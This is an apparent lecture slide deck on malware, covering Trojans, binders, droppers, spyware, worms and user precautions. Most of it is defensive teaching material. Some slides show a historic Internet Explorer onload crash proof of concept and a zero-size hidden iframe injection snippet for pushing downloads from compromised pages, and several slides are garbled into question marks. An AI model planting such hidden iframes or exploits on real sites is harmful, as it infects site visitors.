The Attack and Defense of Computers - PowerPoint PPT Presentation

1 / 84
About This Presentation
Title:

The Attack and Defense of Computers

Description:

... custom compiled program that will decompress and launch the embedded programs. ... the embedded files in it are automatically decompressed and launched. ... – PowerPoint PPT presentation

Number of Views:50
Avg rating:3.0/5.0
Slides: 85
Provided by: yanl
Category:

less

Transcript and Presenter's Notes

Title: The Attack and Defense of Computers


1
  • The Attack and Defense of Computers
  • Dr. ? ? ?

2
  • Malware

3
Malicious Software (Malware)
  • Security tools and toolkits
  • Back doors (trap doors)
  • Logic bombs
  • Viruses
  • Worms
  • Binders
  • Droppers
  • Trojan Horses
  • Bacteria or rabbit programs.
  • Spyware
  • Rootkit
  • URL Injection
  • Dialers

4
Security Tools and toolkits
  • Automatically scan for computer security
    weaknesses.
  • Can be used by both security professionals and
    attackers.
  • e.g. Nessus, COPS, ISS, Tiger, and so on.
  • There are also programs and tool sets whose only
    function is to attack computers.
  • Script kids
  • P.S. These tools may damage the systems that
    install them or may contain booby-trap that will
    compromise the systems that install them.

5
Logic Bombs
  • A logic bomb is a piece of code intentionally
    inserted into a software system that will set off
    a malicious function when specified conditions
    are met.
  • For example, a programmer may hide a piece of
    code that starts deleting files, should he ever
    leave the company (and the salary database).
  • Usually written by inner programmers.

6
Logic Bombs and Viruses and Worms
  • Software that is inherently malicious, such as
    viruses and worms, often contain logic bombs that
    execute a certain payload
  • at a pre-defined time
  • or
  • when some other condition is met.
  • Many viruses attack their host systems on
    specific dates, such as Friday the 13th or April
    Fool's Day.
  • Trojans that activate on certain dates are often
    called "time bombs".

7
Key Logger
  • A program or hardware device that captures every
    key depression on the computer.
  • Also known as "Keystroke Cops," they are used to
    monitor a user's activities by recording every
    keystroke the user makes, including typos,
    backspacing, and retyping.

8
Security Concerns about Key Loggers
  • Keystroke logging can be achieved by both
    hardware and software means.
  • There is no easy way to prevent keylogging
    software being installed on your PC, as it is
    usually done by a method of stealth.
  • If you are using a home PC, then it is likely to
    be free on any keystroke logging hardware (but
    remember there may be keystroke logging software).

9
Precautions against Key Loggers
  • Try and avoid typing private details on public
    PCs,
  • Always try and avoid visiting sites on public PCs
    that require you to enter your login details,
    e.g. an online banking account.

10
Example
  • Ardamax Keylogger 12

11
Dialers
  • A program that
  • replaces the phone number in a moderns dial-up
    connection with a long distance number, often out
    of the country, in order to run up phone charges
    on pay-per-dial numbers
  • dials out at night to send keylogger or other
    information to an attacker.

12
URL Injection
  • Change the URL submitted to a server belonging to
    some or all domains.

13
Bacteria and Rabbits
  • Bacteria (also known as rabbit programs) are a
    type of malware that create many instances of
    themselves, or run many times simultaneously, in
    order to consume large amounts of system
    resources.
  • Bacteria create a denial of service effect as
    legitimate programs may no longer be able to run,
    or at least may not run properly.

14
  • Binder CA

15
Definition of Binder 
  • A tool that combines two or more files into a
    single file, usually for the purpose of hiding
    one of them.
  • A binder compiles the list of files that you
    select into one host file, which you can rename.
  • A host file is a simple custom compiled program
    that will decompress and launch the embedded
    programs.
  • When you start the host, the embedded files in it
    are automatically decompressed and launched.

16
Example
  • When a Trojan is bound with Notepad, for
    instance, the result will appear to be Notepad,
    and appear to run like Notepad, but the Trojan
    will also be run.

17
Program
  • YAB Yet Another Binder
  • User Guide

18
  • Dropper Wikipedia

19
Definition of a Dropper
  • A dropper is a program (malware component) that
    has been designed to "install" some sort of
    malware (virus, backdoor, etc) to a target
    system.
  • Single stage the malware code can be contained
    within the dropper in such a way as to avoid
    detection by virus scanners
  • Two stages the dropper may download the malware
    to the target machine once activated

20
Types of Droppers
  • There are two major types of droppers
  • those that do not require user interaction
  • perform through the exploitation of a system by
    some vulnerability
  • those that require user interaction by convincing
    the user that it is some legitimate or benign
    program.

21
Examples
  • 8sec!Trojan

22
  • Trojan Horse Wikipedia

23
Trojan Horse
  • In the context of computer software, a Trojan
    horse is a malicious program that is disguised as
    or embedded within legitimate software.
  • Trojans use false and fake names to trick users
    into executing them.
  • These strategies are often collectively termed
    social engineering.
  • A Trojan is designed to operate with functions
    unknown to the victim.
  • The useful, or seemingly useful, functions serve
    as camouflage for these undesired functions.

24
Properties of Trojan Horses
  • Trojan horse programs cannot operate
    autonomously, in contrast to some other types of
    malware, like worms.
  • Just as the Greeks needed the Trojans to bring
    the horse inside for their plan to work,
  • Trojan horse programs depend on actions by the
    intended victims
  • if Trojans replicate and even distribute
    themselves, each new victim must run the
    program/Trojan.
  • Due to the above reasons Trojan horses virulence
    depends on
  • successful implementation of social engineering
    concepts
  • but doesnt depend on
  • the flaws in a computer system's security design
    or configuration.

25
Categories of Trojan Horses
  • There are two common types of Trojan horses
  • an otherwise useful software that has been
    corrupted by a cracker inserting malicious code
    that executes while the program is used.
  • Examples include various implementations of
  • weather alerting programs
  • computer clock setting software
  • peer to peer file sharing utilities.
  • a standalone program that masquerades as
    something else, like a game or image file (e.g.
    firework.jpg.exe in Windows.

26
Malware Parasitizes inside Trojan Horses
  • In practice, Trojan Horses in the wild often
    contain
  • spying functions (such as a packet sniffer)
  • backdoor functions that allow a computer,
    unbeknownst to the owner, to be remotely
    controlled from the network, creating a zombie
    computer.
  • The Sony/BMG rootkit Trojan, distributed on
    millions of music CDs through 2005, did both of
    these things.
  • Because Trojan horses often have these harmful
    behaviors, there often arises the
    misunderstanding that such functions define a
    Trojan Horse.

27
Example of a Simple Trojan Horse
  • A simple example of a Trojan horse would be a
    program named waterfalls.scr.exe claiming to be a
    free waterfall screensaver which, when run,
    instead begins erasing all the files on the
    computer.

28
E-Mail Trojan Horses
  • On the Microsoft Windows platform, an attacker
    might attach a Trojan horse with an
    innocent-looking filename to an email message
    which entices the recipient into opening the
    file.
  • The Trojan horse itself would typically be a
    Windows executable program file, and thus must
    have an executable filename extension such as
    .exe, .com, .scr, .bat, or .pif.
  • Since Windows is sometimes configured by default
    to hide filename extensions from a user, the
    Trojan horse has an extension that might be
    "masked" by giving it a name such as
    Readme.txt.exe. With file extensions hidden, the
    user would only see Readme.txt and could mistake
    it for a harmless text file.
  • Icons can also be chosen to imitate the icon
    associated with a different and benign program,
    or file type.

29
Trojan Downloader F-SecureMicrosoft
  • Trojan downloader is usually a standalone program
    that attempts to secretly download and run other
    files from remote web and ftp sites.
  • Usually Trojan downloaders
  • download different Trojans and backdoors
  • activate them on an affected system without
    user's approval.
  • Trojan downloader, when run, usually installs
    itself to system and waits until Internet
    connection becomes available. After that it
    attempts to connect to a web or ftp site,
    download specific file or files and run them.

30
Commonly Used Methods of Infection
  • Websites (??).
  • E-mails.
  • Downloaded Files.

31
Websites
  • You can be infected by visiting a rogue website.
  • Internet Explorer is most often targeted by
    makers of Trojans and other pests, because it
    contains numerous bugs.
  • Some of the bugs improperly handle data (such as
    HTML or images) by executing it as a legitimate
    program.
  • Attackers who find such vulnerabilities can then
    specially craft a bit of malformed data so that
    it contains a valid program to do their bidding.
  • The more "features" a web browser has, the higher
    your risk of having security holes that can be
    exploited by a Trojan horse.
  • for example
  • ActiveX objects,
  • some older versions of Flash
  • Java

32
Example 1 Microsoft IE window() Arbitrary Code
Execution Vulnerability Secunia
  • The vulnerability is caused due to certain
    objects not being initialized correctly when the
    window() function is used in conjunction with the
    ltbody onloadgt event.
  • This can be exploited to execute arbitrary code
    on a vulnerable browser via some specially
    crafted JavaScript code called directly when a
    site has been loaded.Exampleltbody
    onload"window()"gtSuccessful exploitation
    requires that the user is e.g. tricked into
    visiting a malicious website.
  • PROOF OF CONCEPT

33
  • Explanation Computer Terrorism

34
ltbody onLoad gt HTML Code Tutorial
  • The browser triggers onLoad when the document is
    finished loading. The contents of onLoad is one
    or more JavaScript commands. So, for example, the
    following ltbody ...gt tag tells the browser to
    bring up an alert box once the page is completely
    loaded
  • ltBODY onLoad"alert('hello world!')"gt

35
MS IE - Crash on JavaScript window()- calling (1)
  • There is a bug in Microsoft Internet Explorer,
    which causes a crash in it.
  • The bug occurs, because Microsoft Internet
    Explorer can't handle a call to a
    JavaScript-function with the name of the
    "window"-object.

An object used in Javascript.
36
MS IE - Crash on JavaScript window()- calling (2)
symantic
  • Internet Explorer fails to properly initialize
    the JavaScript Window()' function. When the
    'onLoad' handler is set to call the improperly
    initialized Window()' function, the Web browser
    attempts to call the address 0x006F005B, which is
    derived from the Unicode representation of
    'OBJECT'.
  • CALL DWORD ECX8
  • It is shown that JavaScript prompt boxes can be
    used by attackers to fill the memory region at
    0x00600000 with attacker-supplied data, allowing
    executable machine code to be placed into the
    required address space.
  • Crash, if pointing to non-code.
  • Execution, if pointing to code.

37
Dangerous Web Site
  • The web site pointed by the following URL is one
    containing the trap described in the previous
    slides.
  • HTTP MSIE JavaScript OnLoad Rte CodeExec
    symantic
  • http//marc.theaimsgroup.com/?lbugtraqm11174639
    4106172w2

38
Example 2 Trojan Horse Exploits Image Flaw
Declan McCullagh et al.
  • EasyNews, a provider of Usenet newsgroups, said
    it has identified two JPEG images that take
    advantage of a previously identified flaw ( a
    heap-based buffer overflow Michael Cobb ) in
    the way Microsoft software handles graphics
    files.
  • Windows users could have their computers infected
    merely by opening one of those Trojan horse
    images.
  • Attackers tried to use these JPEGs to download
    Trojan (horse programs) to vulnerable computers.

39
Example 3 Comprise a Web Server and Add Hidden
Download Instructions in Web Pages
  • Create frame with size 0.

40
  • ??????OpenBlue

41
  • ?????
  • ??
  • SQL Injection ?
  • ?????,?????? ????????? ?? ??????? .

42
????
  • ???????
  • ltiframe src???? width0 height0gtlt/iframegt

43
JScript ????
  • ?????????? xxx.js ??????????????????
  • document.write("ltiframe width'0' height'0'
    src'????'gtlt/iframegt")
  • ??JScript ??????
  • ???????
  • ltscript languagejavascript srcxxx.jsgtlt/scriptgt

44
Emails and Trojan Horses
  • The majority of Trojan horse infections occur
    because the user was tricked into running an
    infected program.
  • This is why you're not supposed to open
    unexpected attachments on emails -- the program
    is often a cute animation or a sexy picture, but
    behind the scenes it infects the computer with a
    Trojan or virus.

45
Microsoft Outlook
  • If you use Microsoft Outlook, you're vulnerable
    to many of the same problems that Internet
    Explorer has, even if you don't use IE directly.
  • The same vulnerabilities exist since Outlook
    allows email to contain HTML and images (and
    actually uses much of the same code to process
    these as Internet Explorer).

46
Downloaded Files
  • The infected program doesn't have to arrive via
    email, though it can be
  • sent to you in an Instant Message
  • downloaded from a Web site or by FTP
  • delivered on a CD or floppy disk

47
Precautions against Trojan Horses (1)
  • Trojan Horses are commonly spread through an
    e-mail, much like other types of common viruses.
  • The best ways to protect yourself and your
    company from Trojan Horses are as follows
  • If you receive e-mail from someone that you do
    not know or you receive an unknown attachment
    never open it right away.
  • As an e-mail user you should confirm the source.
  • Some hackers have the ability to steal an address
    books so if you see e-mail from someone you know
    that does not necessarily make it safe.

48
Precautions against Trojan Horses (2)
  • When setting up your e-mail client make sure that
    you have the settings so that attachments do not
    open automatically.
  • Some e-mail clients come ready with an anti-virus
    program that scans any attachments before they
    are opened.
  • If your client does not come with this it would
    be best to purchase on or download one for free.
  • Make sure your computer has an anti-virus program
    on it and make sure you update it regularly.
  • If you have an auto-update option included in
    your anti-virus program you should turn it on,
    that way if you forget to update your software
    you can still be protected from threats

49
Precautions against Trojan Horses (3)
  • Operating systems offer patches to protect their
    users from certain threats and viruses, including
    Trojan Horses.
  • Software developers like Microsoft offer patches
    that in a sense close the hole that the Trojan
    horse or other virus would use to get through to
    your system. If you keep your system updated with
    these patches your computer is kept much safer.
  • Avoid using peer-2-peer or P2P sharing networks
    like Kazaa, Limewire, Ares, or Gnutella because
  • those programs are generally unprotected from
    Trojan Horses
  • Trojan Horses are especially easy to spread
    through these programs
  • Some of these programs do offer some virus
    protection but often they are not strong enough.

50
Precautions against Trojan Horses (4)
  • NEVER download blindly from people or sites which
    you arent 100 sure about.
  • However, legal web sites may be comprised by
    attackers who may modify web pages to contain
    scripts to download malware.
  • Even if the file comes form a friend, you still
    must be sure what the file is before opening it.
    (Ask your friend whether she/he sent the files to
    you.)
  • Beware of hidden file extensions (Under Windows
    susie.jpg.exe is only shown as susie.jpg)
  • Never user features in your programs that
    automatically get or preview files (outlook,
    preview mode ).
  • Never blindly type commands that others tell you
    to type, or go to the web site mentioned by
    strangers.

51
Well-known Trojan Horses
  • Back Orifice
  • Back Orifice 2000
  • Beast Trojan
  • NetBus
  • SubSeven
  • Downloader-EV
  • Pest Trap
  • flooder
  • Tagasaurus
  • Vundo trojan
  • Gromozon Trojan

52
Experiment
  • Survey some Trojan horses to see what approaches
    are adopted by them to fool a user to execute
    them.

53
List of Trojan Horses
  • http//en.wikipedia.org/wiki/List_of_trojan_horses

54
  • Spyware Wikipedia

55
A Large Number of Toolbars, Some Added by
Spyware, Overwhelm an IE Session
56
Some Statistics about Spyware A. Moshchuk et al.
  • A scan (2005) performed by AOL/NCSA of 329
    customers computers found that 80 were infected
    with spyware programs.
  • Each infected computer contained an average of 93
    spyware components.

57
Definition of Spyware
  • Spyware is computer software that is installed
    surreptitiously on a personal computer to
  • monitor
  • intercept
  • or
  • take partial control over
  • the user's interaction with the computer,
    without the user's informed consent.

58
Activities of Spyware
  • Spyware programs can
  • secretly monitor the user's behavior and then
    send this information to a hacker over the
    Internet
  • collect various types of personal information
  • interfere with user control of the computer in
    other ways, such as
  • installing additional software
  • redirecting Web browser activity
  • diverting advertising revenue to a third party.

59
Spyware Funcions A. Moshchuk et al.
60
Types of Information Collected by Spyware
  • Spyware can collect many different types of
    information about a user.
  • More benign programs can attempt to track what
    types of websites a user visits and send this
    information to an advertisement agency.
  • More malicious versions can try to record what a
    user types to try to intercept passwords or
    credit card numbers.
  • Yet other versions simply launch pop-ups with
    advertisements.

61
OSes vs. Spyware
  • As of 2006, spyware has become one of the
    pre-eminent security threats to computer-systems
    running Microsoft Windows OSes.
  • Some malware on the Linux and Mac OS X platforms
    has behavior similar to Windows spyware, but to
    date has not become anywhere near as widespread.

62
Spyware Certification
  • The Spyware-Free Certification program evaluates
    software to ensure that the program does not
    install or execute any forms of malicious code.

63
Typical Tactics Adopted by Spyware
  • Delivery of unsolicited pop-up advertisements.
  • Monitoring of Web-browsing activity for marketing
    purposes.
  • Theft of personal information

64
Adware
  • The term adware frequently refers to any software
    which displays advertisements, whether or not it
    does so with the user's consent.
  • Programs such as the Eudora mail client display
    advertisements as an alternative to shareware
    registration fees.
  • These classify as "adware" in the sense of
    advertising-supported software, but not as
    spyware.
  • Adware in this form does not operate
    surreptitiously or mislead the user, and provides
    the user with a specific service.

65
Spyware and Pop-up Ads
  • Spyware displays advertisements related to what
    it finds from spying on you, not the ones posted
    by advertisers.
  • Claria Corporation's Gator Software and Exact
    Advertising's BargainBuddy provide examples of
    this sort of program.
  • Visited Web sites frequently install Gator on
    client machines in a surreptitious manner, and it
    directs revenue to the installing site and to
    Claria by displaying advertisements to the user.
    The user experiences a large number of pop-up
    advertisements.

66
Pop-up Ads
  • Pop-up ads or popups are a form of online
    advertising on the World Wide Web.
  • It works when certain web pages open a new web
    browser window to display advertisements.
  • The pop-up window containing an advertisement is
    usually generated by JavaScript, but can be
    generated by other means as well.

67
Pop-under Ads
  • A variation on the pop-up window is the pop-under
    advertisement. This opens a new browser window,
    behind the active window.
  • Pop-unders interrupt the user less, but are not
    seen until the desired windows are closed, making
    it more difficult for the user to determine which
    Web page opened them.

68
Dozens of Pop-up Ads Cover a Desktop.
69
Web Activity Monitor
  • Other spyware behavior, such as reporting on
    websites the user visits, frequently accompany
    the displaying of advertisements.
  • Monitoring web activity aims at building up a
    marketing profile on users in order to sell
    "targeted" advertisement impressions.

70
Other Victims of Spyware
  • The prevalence of spyware has cast suspicion upon
    other programs that track Web browsing, even for
    statistical or research purposes.
  • Some observers describe the Alexa Toolbar, an
    Internet Explorer plug-in published by
    Amazon.com, as spyware (and some anti-spyware
    programs report it as such) although many users
    choose to install it.

71
Identity Theft and Fraud
  • Some spyware is closely associated with identity
    theft.
  • Spyware may transmit the following information to
    attackers
  • chat sessions,
  • user names,
  • passwords,
  • bank information, etc.
  • Spyware has principally become associated with
    identity theft in that keyloggers are routinely
    packaged with spyware.
  • John Bambenek, who researches information
    security, estimates that identity thieves have
    stolen over 24 billion US dollars of account
    information in the United States alone

72
  • Routes of Infection

73
Routes of Infection
  • Spyware does not directly spread in the manner of
    a computer virus or worm
  • generally, an infected system does not attempt to
    transmit the infection to other computers.
  • Instead, spyware gets on a system
  • through deception of the user
  • or
  • through exploitation of software vulnerabilities.

74
Masquerade
  • One way of distributing spyware involves tricking
    users by manipulating security features designed
    to prevent unwanted installations.

75
Masquerade - Example
  • The Internet Explorer Web browser, by design,
    prevents websites from initiating an unwanted
    download.
  • Instead, a user action (such as clicking on a
    link) must normally trigger a download.
  • However, links can prove deceptive
  • For instance,
  • A pop-up ad may appear like a standard Windows
    dialog box.
  • The box contains a message such as "Would you
    like to optimize your Internet access?" with
    links which look like buttons reading Yes and No.
  • No matter which "button" the user presses, a
    download starts, placing the spyware on the
    user's system.

76
A Masquerade Example
  • Malicious websites may attempt to install spyware
    on readers' computers.
  • In this screenshot a website has triggered a
    pop-up that offers spyware in the guise of a
    security upgrade.

77
Bundled with Shareware
  • Spyware can also come bundled with
  • shareware
  • other downloadable software
  • music CDs.
  • The user downloads a program (for instance, a
    music program or a file-trading utility) and
    installs it, and the installer additionally
    installs the spyware. Although the desirable
    software itself may do no harm, the bundled
    spyware does.
  • In some cases, spyware authors have paid
    shareware authors to bundle spyware with their
    software.
  • In other cases, spyware authors have repackaged
    desirable free software with installers that add
    spyware.

78
Bundled Shareware Example
  • The BearShare file-trading program, "supported"
    by WhenU spyware.
  • In order to install BearShare, users must agree
    to install "the SAVE! bundle" from WhenU.
  • The installer provides only a tiny window in
    which to read the lengthy license agreement.
    Although the installer claims otherwise, the
    software transmits users' browsing activity to
    WhenU servers.

79
Through Trojan Horse
  • Classically, a Trojan horse, by definition,
    smuggles in something dangerous in the guise of
    something desirable. Some spyware programs get
    spread in just this manner.
  • The distributor of spyware presents the program
    as a useful utility for instance as a Web
    accelerator or as a helpful software agent.
  • Users download and install the software without
    immediately suspecting that it could cause harm.

80
Vulnerabilities in Web Browsers
  • Some spyware authors infect a system by attacking
    security holes
  • in the Web browser
  • or
  • in other software.
  • When the user navigates to a Web page controlled
    by the spyware author, the page contains code
    which attacks the browser and forces the download
    and install of spyware.
  • Common browser exploits target security
    vulnerabilities in Internet Explorer and in the
    Microsoft Java runtime.

81
Notable Programs Distributed with Spyware
  • Messenger Plus! (only if you agree to install
    their "sponsor" program)
  • Bearshare
  • Bonzi Buddy
  • DAEMON Tools (only if you agree to install their
    "sponsor" program)
  • DivX (except for the paid version, and the
    "standard" version without the encoder). DivX
    announced removal of GAIN software from version
    5.2.
  • Dope Wars
  • ErrorGuard
  • FlashGet (free version)
  • Grokster
  • Kazaa
  • Morpheus
  • RadLight
  • WeatherBug
  • EDonkey2000

82
  • Worm

83
Worms
  • Worm spread themselves through proactively
    attacking programs with specific vulnerability.
  • Most frequently used attack approaches included
    buffer overflow attacks, format string attacks,
    integer overflow attacks, and so on.
  • Morris Worm ,1988
  • Code Red, Slammer.

84
Comparisons between Viruses, Trojan Horses, and
Worms
  • The way they behave
  • How are they triggered?
  • How do they spread?
  • Need host programs?
Write a Comment
User Comments (0)
About PowerShow.com